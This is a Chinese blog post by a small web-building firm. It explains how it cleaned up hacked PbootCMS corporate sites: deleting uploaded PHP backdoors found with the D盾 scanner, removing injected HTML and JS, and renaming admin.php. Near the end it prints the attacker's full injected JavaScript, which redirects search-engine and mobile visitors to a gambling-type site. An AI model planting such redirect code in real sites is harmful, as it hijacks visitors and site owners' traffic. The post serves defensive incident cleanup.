昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改)
1)网站被黑以后的表现形式:
就跟上面显示的一样,被黑以后对方会在首页进行插入一些对方的信息,这里是关于一个体育的灰网的站点,而且这里对方还做了一个小的识别,那就是你直接输入网址或者通过收藏夹进入的都是正常的,但是通过搜索引擎点击进入的就会进行跳转到对方的网站.这里对方使用的是js的方式进行跳转的,后面我们会说。
2)如何进行清理
下载一个d盾,使用D盾进行扫描php文件(不知道其他类型的可不可以,我这边只是能扫描php后缀的)
通过扫描我们可以看到关于PHP后缀的文件的一些涉及危险操作的文件,如果你的pb没有进行过二开,也没有使用cms88或者其他人的一些含有加密授权的插件的话,那么除了Kernel.php这个官方文件以外其他的文件都是对方上传的后门文件了,我们要做的就是在d盾中通过右键选择删除的方式进行删除这些后门文件。
操作完d盾以后我们还需要寻找对方留下的js文件以及html文件,对方会把我们根目录下的index.php给修改的同时还会上传一个m.html类似名称的html文件,这里我们可以根据前面我们清理的后台文件的上传时间得知哪些文件是同一天被修改的,那么我们也就需要删除根目录下的这些文件。删除以后看我们的首页引用的js文件路径是哪里,然后找到对应的目录,看看这些js文件有没有被修改。小编这里遇到的情况都是会有两个js文件被对方加入了两段代码,分别在js文件的开头与结尾,把这个也删除就好了(删除对方加入的代码,不是删除整个js文件,如果你有本地备份直接替换也可以)。
3)针对pb做一些简单的防止被批量扫码的设置。
1.数据库中插入系统的名称,不进行默认显示pbootcms系统的字样
2.把admin.php的文件命名为其他名称,比如xxx.php,这样我们登录的时候就是http://www.371302.cn/xxx.php 的路径了。也能避免一些被扫的风险。
4)说一下对方设置的js跳转的方式,主要是在https://www.xxx.com/bb.js 这个文件中(有时候会放到其他地方,不过js代码是一致的)
在这里打开以后可以看到下面的方法,这里猜想agent_code=5306274'应该就是对方的邀请码之类的或者用于计算佣金的地方。根据被导入到目标网站的次数计算佣金把。
var sp_regexps =
/.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)./gi;
var sp_whereis = window.location.referrer;
try {
sp_whereis = top.document.referrer;
} catch (e) {}
try {
sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {
sp_domains = top.document.domain;
} catch (e) {}
try {
sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {
window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';
parent.window.opener.location = 'https://www.xxx.com:9152/?agent_code=5306274';
}
function browserRedirect() {
var sUserAgent = navigator.userAgent.toLowerCase();
var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';
var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';
var bIsMidp = sUserAgent.match(/midp/i) == 'midp';
var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';
var bIsAndroid = sUserAgent.match(/android/i) == 'android';
var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';
var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';
if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {
} else {
window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';
}
}
browserRedirect();
var s=document.referrer;
var str=window.location.href;
if(s.indexOf("b"+"ai"+"du")>0 || s.indexOf("s"+"ogou")>0|| s.indexOf("s"+"m")>0 || s.indexOf("360")>0 || s.indexOf("s"+"o")>0|| s.indexOf("go"+"o"+"gle")>0 || s.indexOf("bing")>0 || s.indexOf("youdao")>0 )
window.location.href="https://www.xxx.com:9152/?agent_code=5306274";以上便是临沂建站分享的有关本次挂马的处理过程,分别从被黑以后的表现形式以及处理过程还有最后的简单防批量扫码三个方面进行处理。最后不得不说的就是人家确实牛逼,15号被挂的马,17号的时候百度上已经被更新成对方的信息了,要是我们自己修改一次信息没有个一个月的时间是更新不出来的。
